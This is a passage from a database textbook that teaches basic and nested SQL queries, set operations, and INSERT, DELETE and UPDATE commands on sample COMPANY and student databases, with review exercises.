WHERE clause; if any such condition is overlooked, incorrect and very large rela-
tions may result. Notice that Q10 is similar to a CROSS PRODUCT operation fol-
lowed by a PROJECT operation in relational algebra. If we specify all the attributes
of EMPLOYEE and DEPARTMENT in Q10, we get the actual CROSS PRODUCT
(except for duplicate elimination, if any).

To retrieve all the attribute values of the selected tuples, we do not have to list the
attribute names explicitly in SQL; we just specify an asterisk (*), which stands for all
the attributes. For example, query Q1C retrieves all the attribute values of any
EMPLOYEE who works in DEPARTMENT number 5 (Figure 3(g)), query Q1D
retrieves all the attributes of an EMPLOYEE and the attributes of the DEPARTMENT in


which he or she works for every employee of the ‘Research’ department, and Q10A
specifies the CROSS PRODUCT of the EMPLOYEE and DEPARTMENT relations.

Q1C: SELECT *
FROM EMPLOYEE
WHERE Dno=5;

Q1D: SELECT *
FROM EMPLOYEE, DEPARTMENT
WHERE Dname=‘Research’ AND Dno=Dnumber;

Q10A: SELECT *
FROM EMPLOYEE, DEPARTMENT;

3.4 Tables as Sets in SQL
As we mentioned earlier, SQL usually treats a table not as a set but rather as a
multiset; duplicate tuples can appear more than once in a table, and in the result of a
query. SQL does not automatically eliminate duplicate tuples in the results of
queries, for the following reasons:

■ Duplicate elimination is an expensive operation. One way to implement it is
to sort the tuples first and then eliminate duplicates.

■ The user may want to see duplicate tuples in the result of a query.

■ When an aggregate function is applied to tuples, in most cases we do not
want to eliminate duplicates.

An SQL table with a key is restricted to being a set, since the key value must be dis-
tinct in each tuple.10 If we do want to eliminate duplicate tuples from the result of
an SQL query, we use the keyword DISTINCT in the SELECT clause, meaning that
only distinct tuples should remain in the result. In general, a query with SELECT
DISTINCT eliminates duplicates, whereas a query with SELECT ALL does not.
Specifying SELECT with neither ALL nor DISTINCT—as in our previous examples—
is equivalent to SELECT ALL. For example, Q11 retrieves the salary of every
employee; if several employees have the same salary, that salary value will appear as
many times in the result of the query, as shown in Figure 4(a). If we are interested
only in distinct salary values, we want each value to appear only once, regardless of
how many employees earn that salary. By using the keyword DISTINCT as in Q11A,
we accomplish this, as shown in Figure 4(b).

Query 11. Retrieve the salary of every employee (Q11) and all distinct salary
values (Q11A).

Q11: SELECT ALL Salary
FROM EMPLOYEE;

Q11A: SELECT DISTINCT Salary
FROM EMPLOYEE;

10In general, an SQL table is not required to have a key, although in most cases there will be one.


Figure 4
Results of additional SQL queries when applied to the COMPANY database state shown in Figure A.3. (a) Q11. (b) Q11A. (c) Q16. (d) Q18.

SQL has directly incorporated some of the set operations from mathematical set
theory, which are also part of relational algebra (see Chapter 6). There are set union
(UNION), set difference (EXCEPT),11 and set intersection (INTERSECT) operations.
The relations resulting from these set operations are sets of tuples; that is, duplicate
tuples are eliminated from the result. These set operations apply only to union-com-
patible relations, so we must make sure that the two relations on which we apply the
operation have the same attributes and that the attributes appear in the same order
in both relations. The next example illustrates the use of UNION.

Query 4. Make a list of all project numbers for projects that involve an
employee whose last name is ‘Smith’, either as a worker or as a manager of the
department that controls the project.

Q4A: (SELECT DISTINCT Pnumber
FROM PROJECT, DEPARTMENT, EMPLOYEE
WHERE Dnum=Dnumber AND Mgr_ssn=Ssn

AND Lname=‘Smith’ )
UNION

( SELECT DISTINCT Pnumber
FROM PROJECT, WORKS_ON, EMPLOYEE
WHERE Pnumber=Pno AND Essn=Ssn

AND Lname=‘Smith’ );

The first SELECT query retrieves the projects that involve a ‘Smith’ as manager of
the department that controls the project, and the second retrieves the projects that
involve a ‘Smith’ as a worker on the project. Notice that if several employees have the
last name ‘Smith’, the project numbers involving any of them will be retrieved.
Applying the UNION operation to the two SELECT queries gives the desired result.

SQL also has corresponding multiset operations, which are followed by the keyword
ALL (UNION ALL, EXCEPT ALL, INTERSECT ALL). Their results are multisets (dupli-
cates are not eliminated). The behavior of these operations is illustrated by the
examples in Figure 5. Basically, each tuple—whether it is a duplicate or not—is con-
sidered as a different tuple when applying these operations.

11In some systems, the keyword MINUS is used for the set difference operation instead of EXCEPT.
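
As a small additional sketch (ours, not one of the numbered queries), INTERSECT can be applied to the COMPANY schema to list the Ssn values of employees who both work on some project and have at least one dependent:

( SELECT Essn FROM WORKS_ON )
INTERSECT
( SELECT Essn FROM DEPENDENT );                     -- duplicates are eliminated, so the result is a set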


(a) R(A): a1, a2, a2, a3      S(A): a1, a2, a4, a5
(b) T(A): a1, a1, a2, a2, a2, a3, a4, a5
(c) T(A): a2, a3
(d) T(A): a1, a2

Figure 5
The results of SQL multiset operations. (a) Two tables, R(A) and S(A). (b) R(A) UNION ALL S(A). (c) R(A) EXCEPT ALL S(A). (d) R(A) INTERSECT ALL S(A).

3.5 Substring Pattern Matching and Arithmetic Operators
In this section we discuss several more features of SQL. The first feature allows com-
parison conditions on only parts of a character string, using the LIKE comparison
operator. This can be used for string pattern matching. Partial strings are specified
using two reserved characters: % replaces an arbitrary number of zero or more
characters, and the underscore (_) replaces a single character. For example, consider
the following query.

Query 12. Retrieve all employees whose address is in Houston, Texas.

Q12: SELECT Fname, Lname
FROM EMPLOYEE
WHERE Address LIKE ‘%Houston,TX%’;

To retrieve all employees who were born during the 1950s, we can use Query Q12A.
Here, ‘5’ must be the third character of the string (according to our format for date),
so we use the value ‘_ _ 5 _ _ _ _ _ _ _’, with each underscore serving as a placeholder
for an arbitrary character.

Query 12A. Find all employees who were born during the 1950s.

Q12A: SELECT Fname, Lname
FROM EMPLOYEE
WHERE Bdate LIKE ‘_ _ 5 _ _ _ _ _ _ _’;

If an underscore or % is needed as a literal character in the string, the character
should be preceded by an escape character, which is specified after the string using
the keyword ESCAPE. For example, ‘AB\_CD\%EF’ ESCAPE ‘\’ represents the literal
string ‘AB_CD%EF’ because \ is specified as the escape character. Any character not
used in the string can be chosen as the escape character. Also, we need a rule to
specify apostrophes or single quotation marks (‘ ’) if they are to be included in a
string because they are used to begin and end strings. If an apostrophe (’) is needed,
it is represented as two consecutive apostrophes (’’) so that it will not be interpreted
as ending the string. Notice that substring comparison implies that attribute values


are not atomic (indivisible) values, as one would assume in the formal relational
model.

Another feature allows the use of arithmetic in queries. The standard arithmetic
operators for addition (+), subtraction (–), multiplication (*), and division (/) can
be applied to numeric values or attributes with numeric domains. For example,
suppose that we want to see the effect of giving all employees who work on the
‘ProductX’ project a 10 percent raise; we can issue Query 13 to see what their
salaries would become. This example also shows how we can rename an attribute in
the query result using AS in the SELECT clause.

Query 13. Show the resulting salaries if every employee working on the
‘ProductX’ project is given a 10 percent raise.

Q13: SELECT E.Fname, E.Lname, 1.1 * E.Salary AS Increased_sal
FROM EMPLOYEE AS E, WORKS_ON AS W, PROJECT AS P
WHERE E.Ssn=W.Essn AND W.Pno=P.Pnumber AND

P.Pname=‘ProductX’;

For string data types, the concatenate operator || can be used in a query to append
two string values. For date, time, timestamp, and interval data types, operators
include incrementing (+) or decrementing (–) a date, time, or timestamp by an
interval. In addition, an interval value is the result of the difference between two
date, time, or timestamp values. Another comparison operator, which can be used
for convenience, is BETWEEN, which is illustrated in Query 14.

Query 14. Retrieve all employees in department 5 whose salary is between
$30,000 and $40,000.

Q14: SELECT *
FROM EMPLOYEE
WHERE (Salary BETWEEN 30000 AND 40000) AND Dno = 5;

The condition (Salary BETWEEN 30000 AND 40000) in Q14 is equivalent to the con-
dition ((Salary >= 30000) AND (Salary <= 40000)).

3.6 Ordering of Query Results
SQL allows the user to order the tuples in the result of a query by the values of one or more of the attributes that appear in the query result, by using the ORDER BY clause. This is illustrated by Query 15.

Query 15. Retrieve a list of employees and the projects they are working on, ordered by department and, within each department, ordered alphabetically by last name, then first name.

Q15: SELECT D.Dname, E.Lname, E.Fname, P.Pname
FROM DEPARTMENT D, EMPLOYEE E, WORKS_ON W, PROJECT P
WHERE D.Dnumber=E.Dno AND E.Ssn=W.Essn AND W.Pno=P.Pnumber
ORDER BY D.Dname, E.Lname, E.Fname;

The default order is in ascending order of values. We can specify the keyword DESC if we want to see the result in a descending order of values. The keyword ASC can be used to specify ascending order explicitly. For example, if we want descending alphabetical order on Dname and ascending order on Lname, Fname, the ORDER BY clause of Q15 can be written as

ORDER BY D.Dname DESC, E.Lname ASC, E.Fname ASC

3.7 Discussion and Summary of Basic SQL Retrieval Queries
A simple retrieval query in SQL can consist of up to four clauses, but only the first two—SELECT and FROM—are mandatory. The clauses are specified in the following order, with the clauses between square brackets [ ... ] being optional:

SELECT <attribute list>
FROM <table list>
[ WHERE <condition> ]
[ ORDER BY <attribute list> ];

The SELECT clause lists the attributes to be retrieved, and the FROM clause specifies
all relations (tables) needed in the simple query. The WHERE clause identifies the
conditions for selecting the tuples from these relations, including join conditions if
needed. ORDER BY specifies an order for displaying the results of a query. Two addi-
tional clauses not detailed here are GROUP BY and HAVING.

There are more complex features of SQL retrieval queries. These include the follow-
ing: nested queries that allow one query to be included as part of another query;
aggregate functions that are used to provide summaries of the information in the
tables; two additional clauses (GROUP BY and HAVING) that can be used to provide
additional power to aggregate functions; and various types of joins that can com-
bine records from various tables in different ways.

4 INSERT, DELETE, and UPDATE
Statements in SQL

In SQL, three commands can be used to modify the database: INSERT, DELETE, and
UPDATE. We discuss each of these in turn.

4.1 The INSERT Command
In its simplest form, INSERT is used to add a single tuple to a relation. We must spec-
ify the relation name and a list of values for the tuple. The values should be listed in
the same order in which the corresponding attributes were specified in the CREATE
TABLE command. For example, to add a new tuple to the EMPLOYEE relation shown


in Figure A.2 and specified in the CREATE TABLE EMPLOYEE … command in Figure
1, we can use U1:

U1: INSERT INTO EMPLOYEE
VALUES ( ‘Richard’, ‘K’, ‘Marini’, ‘653298653’, ‘1962-12-30’, ‘98

Oak Forest, Katy, TX’, ‘M’, 37000, ‘653298653’, 4 );

A second form of the INSERT statement allows the user to specify explicit attribute
names that correspond to the values provided in the INSERT command. This is use-
ful if a relation has many attributes but only a few of those attributes are assigned
values in the new tuple. However, the values must include all attributes with NOT
NULL specification and no default value. Attributes with NULL allowed or DEFAULT
values are the ones that can be left out. For example, to enter a tuple for a new
EMPLOYEE for whom we know only the Fname, Lname, Dno, and Ssn attributes, we
can use U1A:

U1A: INSERT INTO EMPLOYEE (Fname, Lname, Dno, Ssn)
VALUES (‘Richard’, ‘Marini’, 4, ‘653298653’);

Attributes not specified in U1A are set to their DEFAULT or to NULL, and the values
are listed in the same order as the attributes are listed in the INSERT command itself.
It is also possible to insert into a relation multiple tuples separated by commas in a
single INSERT command. The attribute values forming each tuple are enclosed in
parentheses.
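
A hedged sketch of this multiple-tuple form, using made-up department locations (the syntax is standard SQL, although not every DBMS accepts a multirow VALUES list):

INSERT INTO DEPT_LOCATIONS (Dnumber, Dlocation)
VALUES (5, ‘Austin’),                               -- hypothetical new location for department 5
       (4, ‘Katy’);                                 -- hypothetical new location for department 4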

A DBMS that fully implements SQL should support and enforce all the integrity
constraints that can be specified in the DDL. For example, if we issue the command
in U2 on the database shown in Figure A.3, the DBMS should reject the operation
because no DEPARTMENT tuple exists in the database with Dnumber = 2. Similarly,
U2A would be rejected because no Ssn value is provided and it is the primary key,
which cannot be NULL.

U2: INSERT INTO EMPLOYEE (Fname, Lname, Ssn, Dno)
VALUES (‘Robert’, ‘Hatcher’, ‘980760540’, 2);
(U2 is rejected if referential integrity checking is provided by the DBMS.)

U2A: INSERT INTO EMPLOYEE (Fname, Lname, Dno)
VALUES (‘Robert’, ‘Hatcher’, 5);
(U2A is rejected if NOT NULL checking is provided by the DBMS.)

A variation of the INSERT command inserts multiple tuples into a relation in con-
junction with creating the relation and loading it with the result of a query. For
example, to create a temporary table that has the employee last name, project name,
and hours per week for each employee working on a project, we can write the state-
ments in U3A and U3B:

U3A: CREATE TABLE WORKS_ON_INFO
( Emp_name VARCHAR(15),

Proj_name VARCHAR(15),
Hours_per_week DECIMAL(3,1) );


U3B: INSERT INTO WORKS_ON_INFO ( Emp_name, Proj_name,
Hours_per_week )

SELECT E.Lname, P.Pname, W.Hours
FROM PROJECT P, WORKS_ON W, EMPLOYEE E
WHERE P.Pnumber=W.Pno AND W.Essn=E.Ssn;

A table WORKS_ON_INFO is created by U3A and is loaded with the joined informa-
tion retrieved from the database by the query in U3B. We can now query
WORKS_ON_INFO as we would any other relation; when we do not need it any
more, we can remove it by using the DROP TABLE command. Notice that the
WORKS_ON_INFO table may not be up-to-date; that is, if we update any of the
PROJECT, WORKS_ON, or EMPLOYEE relations after issuing U3B, the information
in WORKS_ON_INFO may become outdated. We have to create a view to keep such a
table up-to-date.
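
A minimal sketch of such a view follows; the view name WORKS_ON_INFO_V is ours. Unlike the table loaded by U3A and U3B, the contents of the view are recomputed from the base tables whenever it is queried.

CREATE VIEW WORKS_ON_INFO_V (Emp_name, Proj_name, Hours_per_week) AS
SELECT E.Lname, P.Pname, W.Hours
FROM   PROJECT P, WORKS_ON W, EMPLOYEE E
WHERE  P.Pnumber=W.Pno AND W.Essn=E.Ssn;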

4.2 The DELETE Command
The DELETE command removes tuples from a relation. It includes a WHERE clause,
similar to that used in an SQL query, to select the tuples to be deleted. Tuples are
explicitly deleted from only one table at a time. However, the deletion may propa-
gate to tuples in other relations if referential triggered actions are specified in the ref-
erential integrity constraints of the DDL (see Section 2.2).12 Depending on the
number of tuples selected by the condition in the WHERE clause, zero, one, or sev-
eral tuples can be deleted by a single DELETE command. A missing WHERE clause
specifies that all tuples in the relation are to be deleted; however, the table remains
in the database as an empty table. We must use the DROP TABLE command to
remove the table definition. The DELETE commands in U4A to U4D, if applied inde-
pendently to the database in Figure A.3, will delete zero, one, four, and all tuples,
respectively, from the EMPLOYEE relation:

U4A: DELETE FROM EMPLOYEE
WHERE Lname=‘Brown’;

U4B: DELETE FROM EMPLOYEE
WHERE Ssn=‘123456789’;

U4C: DELETE FROM EMPLOYEE
WHERE Dno=5;

U4D: DELETE FROM EMPLOYEE;

4.3 The UPDATE Command
The UPDATE command is used to modify attribute values of one or more selected
tuples. As in the DELETE command, a WHERE clause in the UPDATE command
selects the tuples to be modified from a single relation. However, updating a

12Other actions can be automatically applied through triggers and other mechanisms.


primary key value may propagate to the foreign key values of tuples in other rela-
tions if such a referential triggered action is specified in the referential integrity con-
straints of the DDL (see Section 2.2). An additional SET clause in the UPDATE
command specifies the attributes to be modified and their new values. For example,
to change the location and controlling department number of project number 10 to
‘Bellaire’ and 5, respectively, we use U5:

U5: UPDATE PROJECT
SET Plocation = ‘Bellaire’, Dnum = 5
WHERE Pnumber=10;

Several tuples can be modified with a single UPDATE command. An example is to
give all employees in the ‘Research’ department a 10 percent raise in salary, as shown
in U6. In this request, the modified Salary value depends on the original Salary value
in each tuple, so two references to the Salary attribute are needed. In the SET clause,
the reference to the Salary attribute on the right refers to the old Salary value before
modification, and the one on the left refers to the new Salary value after modification:

U6: UPDATE EMPLOYEE
SET Salary = Salary * 1.1
WHERE Dno = 5;

It is also possible to specify NULL or DEFAULT as the new attribute value. Notice that
each UPDATE command explicitly refers to a single relation only. To modify multiple
relations, we must issue several UPDATE commands.
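
For example, the following hedged sketch sets an attribute to NULL explicitly; the particular Ssn value is chosen only for illustration.

UPDATE EMPLOYEE
SET    Super_ssn = NULL                             -- NULL (or DEFAULT) can be assigned like any other value
WHERE  Ssn=‘888665555’;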

5 Additional Features of SQL
SQL has a number of additional features that we have not described in this chapter.
These are as follows:

■ SQL provides various techniques for specifying complex retrieval queries, including nested queries, aggregate functions, grouping, joined tables, outer joins, and recursive queries; it also provides views, triggers, and assertions, as well as commands for schema modification.

■ SQL has various techniques for writing programs in various programming
languages that include SQL statements to access one or more databases.
These include embedded (and dynamic) SQL, SQL/CLI (Call Level
Interface) and its predecessor ODBC (Open Data Base Connectivity), and
SQL/PSM (Persistent Stored Modules). Also, one can access SQL databases
through the Java programming language using JDBC and SQLJ.

■ Each commercial RDBMS will have, in addition to the SQL commands, a set
of commands for specifying physical database design parameters, file struc-
tures for relations, and access paths such as indexes. We call these commands
a storage definition language (SDL). Earlier versions of SQL had commands


for creating indexes, but these were removed from the language because
they were not at the conceptual schema level. Many systems still have the
CREATE INDEX commands.

■ SQL has transaction control commands. These are used to specify units of
database processing for concurrency control and recovery purposes.

■ SQL has language constructs for specifying the granting and revoking of priv-
ileges to users. Privileges typically correspond to the right to use certain SQL
commands to access certain relations. Each relation is assigned an owner,
and either the owner or the DBA staff can grant to selected users the privi-
lege to use an SQL statement—such as SELECT, INSERT, DELETE, or
UPDATE—to access the relation. In addition, the DBA staff can grant the
privileges to create schemas, tables, or views to certain users. These SQL
commands—called GRANT and REVOKE—are discussed in the context of
database security and authorization.

■ SQL has language constructs for creating triggers. These are generally
referred to as active database techniques, since they specify actions that are
automatically triggered by events such as database updates.

■ SQL has incorporated many features from object-oriented models to have
more powerful capabilities, leading to enhanced relational systems known as
object-relational. Capabilities exist for such actions as creating complex-
structured attributes (also called nested relations), specifying abstract data
types (called UDTs or user-defined types) for attributes and tables, creating
object identifiers for referencing tuples, and specifying operations on types.

■ SQL and relational databases can interact with new technologies such as
XML and OLAP.

6 Summary
In this chapter we presented the SQL database language. This language and its vari-
ations have been implemented as interfaces to many commercial relational DBMSs,
including Oracle’s Oracle and Rdb13; IBM’s DB2, Informix Dynamic Server, and
SQL/DS; Microsoft’s SQL Server and Access; and INGRES. Some open source sys-
tems also provide SQL, such as MySQL and PostgreSQL. The original version of
SQL was implemented in the experimental DBMS called SYSTEM R, which was
developed at IBM Research. SQL is designed to be a comprehensive language that
includes statements for data definition, queries, updates, constraint specification,
and view definition. We discussed the following features of SQL in this chapter: the
data definition commands for creating tables, commands for constraint specifica-
tion, simple retrieval queries, and database update commands.

13Rdb was originally produced by Digital Equipment Corporation. It was acquired by Oracle from Digital in
1994 and is being supported and enhanced.


Review Questions
1. How do the relations (tables) in SQL differ from the relations defined for-

mally? Discuss the other differences in terminology. Why does SQL allow
duplicate tuples in a table or in a query result?

2. List the data types that are allowed for SQL attributes.

3. How does SQL allow implementation of entity integrity and referential
integrity constraints? What about referential triggered actions?

4. Describe the four clauses in the syntax of a simple SQL retrieval query. Show
what type of constructs can be specified in each of the clauses. Which are
required and which are optional?

Exercises
5. Consider the database shown in Figure A.4, whose schema is shown in

Figure A.5. What are the referential integrity constraints that should hold on
the schema? Write appropriate SQL DDL statements to define the database.

6. Repeat Exercise 5, but use the AIRLINE database schema of Figure A.6.

7. Consider the LIBRARY relational database schema shown in Figure 6. Choose
the appropriate action (reject, cascade, set to NULL, set to default) for each
referential integrity constraint, both for the deletion of a referenced tuple and
for the update of a primary key attribute value in a referenced tuple. Justify
your choices.

8. Write appropriate SQL DDL statements for declaring the LIBRARY relational
database schema of Figure 6. Specify the keys and referential triggered
actions.

9. How can the key and foreign key constraints be enforced by the DBMS? Is
the enforcement technique you suggest difficult to implement? Can the con-
straint checks be executed efficiently when updates are applied to the data-
base?

10. Specify the following queries in SQL on the COMPANY relational database
schema shown in Figure A.2. Show the result of each query if it is applied to
the COMPANY database in Figure A.3.

a. Retrieve the names of all employees in department 5 who work more than
10 hours per week on the ProductX project.

b. List the names of all employees who have a dependent with the same first
name as themselves.

c. Find the names of all employees who are directly supervised by ‘Franklin
Wong’.


BOOK
Book_id Title Publisher_name

BOOK_COPIES
Book_id Branch_id No_of_copies

BOOK_AUTHORS
Book_id Author_name

LIBRARY_BRANCH
Branch_id Branch_name Address

PUBLISHER
Name Address Phone

BOOK_LOANS
Book_id Branch_id Card_no Date_out Due_date

BORROWER
Card_no Name Address Phone

Figure 6
A relational database schema for a LIBRARY database.

11. Specify the updates of Exercise 11 from the chapter “The Relational Data Model
and Relational Database Constraints” using the SQL update commands.

12. Specify the following queries in SQL on the database schema of Figure A.4.

a. Retrieve the names of all senior students majoring in ‘CS’ (computer sci-
ence).

b. Retrieve the names of all courses taught by Professor King in 2007 and
2008.

c. For each section taught by Professor King, retrieve the course number,
semester, year, and number of students who took the section.

d. Retrieve the name and transcript of each senior student (Class = 4)
majoring in CS. A transcript includes course name, course number, credit
hours, semester, year, and grade for each course completed by the student.


13. Write SQL update statements to do the following on the database schema
shown in Figure A.4.

a. Insert a new student, <‘Johnson’, 25, 1, ‘Math’>, in the database.

b. Change the class of student ‘Smith’ to 2.

c. Insert a new course, <‘Knowledge Engineering’, ‘CS4390’, 3, ‘CS’>.

d. Delete the record for the student whose name is ‘Smith’ and whose stu-
dent number is 17.

14. Design a relational database schema for a database application of your
choice.

a. Declare your relations, using the SQL DDL.

b. Specify a number of queries in SQL that are needed by your database
application.

c. Based on your expected use of the database, choose some attributes that
should have indexes specified on them.

d. Implement your database, if you have a DBMS that supports SQL.

15. Suppose that the EMPLOYEE table’s constraint EMPSUPERFK, as specified in
Figure 2, is changed to read as follows:

CONSTRAINT EMPSUPERFK
FOREIGN KEY (Super_ssn) REFERENCES EMPLOYEE(Ssn)

ON DELETE CASCADE ON UPDATE CASCADE,

Answer the following questions:

a. What happens when the following command is run on the database state
shown in Figure A.3?

DELETE FROM EMPLOYEE WHERE Lname = ‘Borg’;

b. Is it better to use CASCADE or SET NULL for ON DELETE in the case of the
EMPSUPERFK constraint?

16. Write SQL statements to create a table EMPLOYEE_BACKUP to back up the
EMPLOYEE table shown in Figure A.3.

Selected Bibliography
The SQL language, originally named SEQUEL, was based on the language SQUARE
(Specifying Queries as Relational Expressions), described by Boyce et al. (1975). The
syntax of SQUARE was modified into SEQUEL (Chamberlin and Boyce, 1974) and
then into SEQUEL 2 (Chamberlin et al. 1976), on which SQL is based. The original
implementation of SEQUEL was done at IBM Research, San Jose, California.


EMPLOYEE
Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

DEPARTMENT
Dname Dnumber Mgr_ssn Mgr_start_date

DEPT_LOCATIONS
Dnumber Dlocation

PROJECT
Pname Pnumber Plocation Dnum

WORKS_ON
Essn Pno Hours

DEPENDENT
Essn Dependent_name Sex Bdate Relationship

Figure A.1
Referential integrity constraints displayed on the COMPANY relational database schema.

EMPLOYEE
Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

DEPARTMENT
Dname Dnumber Mgr_ssn Mgr_start_date

DEPT_LOCATIONS
Dnumber Dlocation

PROJECT
Pname Pnumber Plocation Dnum

WORKS_ON
Essn Pno Hours

DEPENDENT
Essn Dependent_name Sex Bdate Relationship

Figure A.2
Schema diagram for the COMPANY relational database schema.


Figure A.3
One possible database state for the COMPANY relational database schema (populated EMPLOYEE, DEPARTMENT, DEPT_LOCATIONS, PROJECT, WORKS_ON, and DEPENDENT tables).


Figure A.4
A database that stores student and course information.

STUDENT
Name Student_number Class Major
Smith 17 1 CS
Brown 8 2 CS

COURSE
Course_name Course_number Credit_hours Department
Intro to Computer Science CS1310 4 CS
Data Structures CS3320 4 CS
Discrete Mathematics MATH2410 3 MATH
Database CS3380 3 CS

SECTION
Section_identifier Course_number Semester Year Instructor
85 MATH2410 Fall 07 King
92 CS1310 Fall 07 Anderson
102 CS3320 Spring 08 Knuth
112 MATH2410 Fall 08 Chang
119 CS1310 Fall 08 Anderson
135 CS3380 Fall 08 Stone

GRADE_REPORT
Student_number Section_identifier Grade
17 112 B
17 119 C
8 85 A
8 92 A
8 102 B
8 135 A

PREREQUISITE
Course_number Prerequisite_number
CS3380 CS3320
CS3380 MATH2410
CS3320 CS1310


Figure A.5
Schema diagram for the database in Figure A.4:
STUDENT(Name, Student_number, Class, Major)
COURSE(Course_name, Course_number, Credit_hours, Department)
SECTION(Section_identifier, Course_number, Semester, Year, Instructor)
GRADE_REPORT(Student_number, Section_identifier, Grade)
PREREQUISITE(Course_number, Prerequisite_number)


Figure A.6
The AIRLINE relational database schema:
AIRPORT(Airport_code, Name, City, State)
FLIGHT(Flight_number, Airline, Weekdays)
FLIGHT_LEG(Flight_number, Leg_number, Departure_airport_code, Scheduled_departure_time, Arrival_airport_code, Scheduled_arrival_time)
LEG_INSTANCE(Flight_number, Leg_number, Date, Number_of_available_seats, Airplane_id, Departure_airport_code, Departure_time, Arrival_airport_code, Arrival_time)
FARE(Flight_number, Fare_code, Amount, Restrictions)
AIRPLANE_TYPE(Airplane_type_name, Max_seats, Company)
CAN_LAND(Airplane_type_name, Airport_code)
AIRPLANE(Airplane_id, Total_number_of_seats, Airplane_type)
SEAT_RESERVATION(Flight_number, Leg_number, Date, Seat_number, Customer_name, Customer_phone)


More SQL: Complex Queries, Triggers, Views, and Schema Modification

This chapter describes somewhat advanced features of the SQL language standard
for relational databases. We start in Section 1 by presenting more complex features of SQL retrieval
queries, such as nested queries, joined tables, outer joins, aggregate functions, and
grouping. In Section 2, we describe the CREATE ASSERTION statement, which
allows the specification of more general constraints on the database. We also intro-
duce the concept of triggers and the CREATE TRIGGER statement. Then, in Section
3, we describe the SQL facility for defining views on the database. Views are also
called virtual or derived tables because they present the user with what appear to be
tables; however, the information in those tables is derived from previously defined
tables. Section 4 introduces the SQL ALTER TABLE statement, which is used for
modifying the database tables and constraints. Section 5 is the chapter summary.

1 More Complex SQL Retrieval Queries
Recall the basic types of retrieval queries in SQL. Because of the generality and expres-
sive power of the language, there are many additional features that allow users to
specify more complex retrievals from the database. We discuss several of these fea-
tures in this section.

From Chapter 5 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.


1.1 Comparisons Involving NULL
and Three-Valued Logic

SQL has various rules for dealing with NULL values. Recall that NULL is used to repre-
sent a missing value, but that it usually has one of three different interpretations—
value unknown (exists but is not known), value not available (exists but is purposely
withheld), or value not applicable (the attribute is undefined for this tuple). Consider
the following examples to illustrate each of the meanings of NULL.

1. Unknown value. A person’s date of birth is not known, so it is represented
by NULL in the database.

2. Unavailable or withheld value. A person has a home phone but does not
want it to be listed, so it is withheld and represented as NULL in the database.

3. Not applicable attribute. An attribute LastCollegeDegree would be NULL for
a person who has no college degrees because it does not apply to that person.

It is often not possible to determine which of the meanings is intended; for example,
a NULL for the home phone of a person can have any of the three meanings. Hence,
SQL does not distinguish between the different meanings of NULL.

In general, each individual NULL value is considered to be different from every other
NULL value in the various database records. When a NULL is involved in a compari-
son operation, the result is considered to be UNKNOWN (it may be TRUE or it may
be FALSE). Hence, SQL uses a three-valued logic with values TRUE, FALSE, and
UNKNOWN instead of the standard two-valued (Boolean) logic with values TRUE or
FALSE. It is therefore necessary to define the results (or truth values) of three-valued
logical expressions when the logical connectives AND, OR, and NOT are used. Table 1
shows the resulting values.

Table 1 Logical Connectives in Three-Valued Logic

(a) AND TRUE FALSE UNKNOWN

TRUE TRUE FALSE UNKNOWN

FALSE FALSE FALSE FALSE

UNKNOWN UNKNOWN FALSE UNKNOWN

(b) OR TRUE FALSE UNKNOWN

TRUE TRUE TRUE TRUE

FALSE TRUE FALSE UNKNOWN

UNKNOWN TRUE UNKNOWN UNKNOWN

(c) NOT

TRUE FALSE

FALSE TRUE

UNKNOWN UNKNOWN


In Tables 1(a) and 1(b), the rows and columns represent the values of the results of
comparison conditions, which would typically appear in the WHERE clause of an
SQL query. Each expression result would have a value of TRUE, FALSE, or
UNKNOWN. The result of combining the two values using the AND logical connec-
tive is shown by the entries in Table 1(a). Table 1(b) shows the result of using the OR
logical connective. For example, the result of (FALSE AND UNKNOWN) is FALSE,
whereas the result of (FALSE OR UNKNOWN) is UNKNOWN. Table 1(c) shows the
result of the NOT logical operation. Notice that in standard Boolean logic, only
TRUE or FALSE values are permitted; there is no UNKNOWN value.

In select-project-join queries, the general rule is that only those combinations of
tuples that evaluate the logical expression in the WHERE clause of the query to
TRUE are selected. Tuple combinations that evaluate to FALSE or UNKNOWN are not
selected. However, there are exceptions to that rule for certain operations, such as
outer joins, as we shall see in Section 1.6.

SQL allows queries that check whether an attribute value is NULL. Rather than using
= or <> to compare an attribute value to NULL, SQL uses the comparison operators
IS or IS NOT. This is because SQL considers each NULL value as being distinct from
every other NULL value, so equality comparison is not appropriate. It follows that
when a join condition is specified, tuples with NULL values for the join attributes are
not included in the result (unless it is an OUTER JOIN; see Section 1.6). Query 18
illustrates this.

Query 18. Retrieve the names of all employees who do not have supervisors.

Q18: SELECT Fname, Lname
FROM EMPLOYEE
WHERE Super_ssn IS NULL;

1.2 Nested Queries, Tuples,
and Set/Multiset Comparisons

Some queries require that existing values in the database be fetched and then used
in a comparison condition. Such queries can be conveniently formulated by using
nested queries, which are complete select-from-where blocks within the WHERE
clause of another query. That other query is called the outer query. Query 4 is for-
mulated in Q4 without a nested query, but it can be rephrased to use nested queries
as shown in Q4A. Q4A introduces the comparison operator IN, which compares a
value v with a set (or multiset) of values V and evaluates to TRUE if v is one of the
elements in V.

The first nested query selects the project numbers of projects that have an employee
with last name ‘Smith’ involved as manager, while the second nested query selects
the project numbers of projects that have an employee with last name ‘Smith’
involved as worker. In the outer query, we use the OR logical connective to retrieve a
PROJECT tuple if the PNUMBER value of that tuple is in the result of either nested
query.


Q4A: SELECT DISTINCT Pnumber
     FROM PROJECT
     WHERE Pnumber IN ( SELECT Pnumber
                        FROM PROJECT, DEPARTMENT, EMPLOYEE
                        WHERE Dnum=Dnumber AND Mgr_ssn=Ssn AND Lname=‘Smith’ )
           OR
           Pnumber IN ( SELECT Pno
                        FROM WORKS_ON, EMPLOYEE
                        WHERE Essn=Ssn AND Lname=‘Smith’ );

If a nested query returns a single attribute and a single tuple, the query result will be
a single (scalar) value. In such cases, it is permissible to use = instead of IN for the
comparison operator. In general, the nested query will return a table (relation),
which is a set or multiset of tuples.
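
For example, the following query (a sketch of our own, not one of the numbered queries in the text) uses = with a scalar nested query; it retrieves the last names of the employees who work for the ‘Research’ department, and it is valid because, as in the COMPANY schema, department names are unique, so the nested query returns a single value:

SELECT Lname
FROM EMPLOYEE
WHERE Dno = ( SELECT Dnumber
              FROM DEPARTMENT
              WHERE Dname=‘Research’ );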

SQL allows the use of tuples of values in comparisons by placing them within
parentheses. To illustrate this, consider the following query:

SELECT DISTINCT Essn
